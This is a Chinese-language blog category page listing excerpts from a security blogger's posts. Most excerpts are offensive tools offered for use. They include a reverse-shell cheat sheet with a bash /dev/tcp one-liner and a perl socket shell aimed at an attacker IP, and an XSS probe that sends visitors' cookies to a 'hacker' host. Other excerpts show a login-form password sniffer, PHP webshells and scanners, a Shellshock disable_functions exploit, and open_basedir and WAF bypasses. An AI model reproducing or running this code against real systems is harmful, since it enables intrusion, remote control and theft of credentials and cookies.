编程
文章平均质量分 72
eT48_Sec
这个作者很懒,什么都没留下…
展开
-
PHP 5.x Shellshock Exploit (bypass disable_functions)
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)# Google Dork: none# Date: 10/31/2014# Exploit Author: Ryan King (Starfall)# Vendor Homepage: http://php.net# Software Link:转载 2015-02-07 22:46:03 · 869 阅读 · 0 评论 -
利用systeminfo命令查找可用的windows提权EXP
利用systeminfo命令查找可用的windows提权EXP,输出的即为未打补丁的漏洞。文章根据网络上的相关内容做了一点修改(更新)systeminfo>tmp.txt&(for /f %i in (MS.txt) do @type tmp.txt|@find /i "%i"||@echo %i)&del /f /q tmp.txtMS.txt中的内容为:转载 2015-03-30 17:38:52 · 4709 阅读 · 0 评论 -
PHP扫描内网存活主机
直接上代码<?PHPheader('Content-Type: text/html; charset=utf-8'); error_reporting(0); function ping($host, $timeout = 1) { $package = "\x08\x00\x7d\x4b\x00\x00\x00\x00PingHost"; $socket = socket_原创 2015-02-01 22:27:28 · 1931 阅读 · 0 评论 -
php-批量端口扫描
phpwebshell端口扫描<?php/*auth: eT48blog: http://blog.csdn.net/et48_sec*/header('Content-Type: text/html; charset=utf-8');error_reporting(0);print<<<END ip: port: END;$timeout=3;fun原创 2015-01-13 14:40:36 · 1142 阅读 · 0 评论 -
PHP实现目录遍历
目录遍历是文件管理的基础,在此基础上增加删除,新建,编辑,下载,浏览就更好了。<?phpheader('Content-Type:text/html; charset=gb2312');error_reporting(0);$dir=$_GET['dir'];if(is_dir($dir)){echo "Index of ".realpath($dir)."";ech原创 2015-01-12 16:34:51 · 589 阅读 · 0 评论 -
PHP小马
http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。<?phperror_reporting(E_ERROR);header('Content-Type:text/html; charset=utf-8');$path=getcwd();$pe原创 2015-01-04 21:18:09 · 1922 阅读 · 1 评论 -
Javascript-截获登录表单的用户名和密码-v1.5
version 1.0 需要代码添加到登陆表单的后面,才可以正常使用。经完善后,可以添加在任何位置,比如 标签里,而不必添加在登录表单的后面。sniffer.js/*author: eT48blog: http://blog.csdn.net/et48_secversion: v1.5*/document.onreadystatechange = function()原创 2014-12-28 21:08:10 · 888 阅读 · 0 评论 -
XSS信息刺探脚本
重复造轮子,是的,我在学习编程。该 javascript 脚本主要收集客户端用户的 User_Agent、Cookie、Domain、Flash_Version。接收信息的文件由PHP编写,同时增加客户端的IP和访问时间。xss_probe.js/*xss_probeby eT48*/var http_server = "http://www.hacker.c原创 2014-12-27 16:14:34 · 636 阅读 · 0 评论 -
php LFI读php文件源码以及直接webshell
小菜无意中看到大牛的一篇文章,看后觉得很受益,所以就转载过来了。之前只知道“include”语句是包含并运行指定文件,遇到的话也只是找上传点然后getshell。看来这篇文章后,才知道还可以读取php文件的源代码,这样的话,就可以读取网站的配置文件了。而且在allow_url_include=On 的情况下,还可以直接执行php代码。原文:http://hi.baidu.com/c转载 2015-01-05 14:13:45 · 1187 阅读 · 0 评论 -
Javascript-截获登录表单的用户名和密码-v1.0
一段截获登录表单的用户名和密码的Javascript脚本。拿下了网站的数据库却破不了MD5的情况下,可以尝试利用这段脚本截获登录表单的用户名和密码。这段脚本需要调用到DOM,所以应把这段代码插在登录表单之后。sniffer.js/*author: eT48blog: http://blog.csdn.net/et48_secversion: 1.0*/va原创 2014-12-28 18:45:28 · 1122 阅读 · 0 评论 -
Reading files in MySQL with file_priv = no
好吧,我是在法客上看到园长发的这篇文章,然后追到乌云,然后追到源头,觉得很是实用,所以就贴出来了。All we know for reading files in MySQL we need file_priv permission.But there is way for reading files without this permission.We can creat转载 2015-01-04 17:16:55 · 574 阅读 · 0 评论 -
Encoding Web Shells in PNG IDAT chunks
原文在这里:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/很老的一篇文章,大概说的是在png图片里面隐藏php一句话代码。现在看来,实现也不难,使用copy命令即可。之所以还写出来是为了练习PHP编程。还可以参考:https://bugscollector.com/tricks原创 2015-01-04 20:59:53 · 1414 阅读 · 0 评论 -
bypass open_basedir
在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。<?php/*titile: bypass open_basedirauth: eT48*/header("Conten-type:text/html; charset:udf-8");error_repor原创 2015-02-06 16:54:01 · 932 阅读 · 0 评论 -
反弹 shell 脚本
从大马里面提取出来的,分别用perl 和 C实现 。保存为reverse_exp,然后执行perl ./reverse_exp 192.168.1.111 13123。在192.168.1.111 上执行 nc -v -l -p 13123#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`转载 2015-02-09 21:42:08 · 644 阅读 · 0 评论 -
Reverse Shell Cheat Sheet
1.bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&12.perlperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){ope转载 2015-02-09 22:03:35 · 801 阅读 · 0 评论 -
php-reverse-shell
功能:返回一个交互式的shell使用:先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如:$ip = '192.168.1.111'; // CHANGE THIS$port = 13123; // CHANGE THISnc -v -l -p 13123然后上传并在浏览器中打开该PHP脚本文件。效果图:源代码转载 2015-02-10 18:40:39 · 1830 阅读 · 0 评论 -
PHP disable_function与safe mode
我只想执行操作系统命令,可是有disable_functions 和 安全模式的阻碍。disable_functions本指令允许你基于安全原因禁止某些函数,从 PHP 4.0.1 起可用。其默认值为空,接受逗号分隔的函数名列表作为参数。 disable_functions 不受安全模式的影响。 本指令只能设置在 php.ini 中。可以通过以下这行代码获取disable_func原创 2015-02-07 21:00:35 · 1491 阅读 · 0 评论 -
菜刀杀狗
中转是一种思路,把狗拦截的关键字以一种等效的方式替换为其他的。<?php $webshell="http://www.example.com/1.php";//把这里改成你的shell地址 $webshell=$webshell."?&1141056911=base64_decode"; $da=$_POST; $data = $da; @$data=str_replace("ba转载 2015-01-29 21:15:51 · 667 阅读 · 0 评论 -
symlink() open_basedir bypass 原理分析
之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。原文:http://cxsecurity.com/issue/WLB-2009110068ok,先来了解一下什么是open_basedir。open_basedir 将 PHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。转载 2015-01-05 22:47:05 · 1560 阅读 · 0 评论 -
使用include实现php一句话
我是菜牛各位看官轻喷。PHP一句话主要实现的是,动态执行PHP代码。PHP小马主要实现的是,文件上传。PHP大马主要实现的是,提权。include 语句包含并运行指定文件。 <?php//服务端if(!empty($_POST['code'])){$code=trim($_POST['code']);$handle=fopen('cmd.txt','w原创 2015-01-05 15:57:03 · 855 阅读 · 0 评论 -
通过UA判断客户端的操作系统类型
我们可以通过一个javascript脚本获取客户端返回的User-Agent,然后根据其中的信息判断客户端使用什么操作系统。Windows系列Windows NT俗称NT 5.0Windows 2000NT 5.1Windows XPNT 5.2Windows XPWindows 2003NT6.0原创 2015-01-03 20:26:00 · 2635 阅读 · 0 评论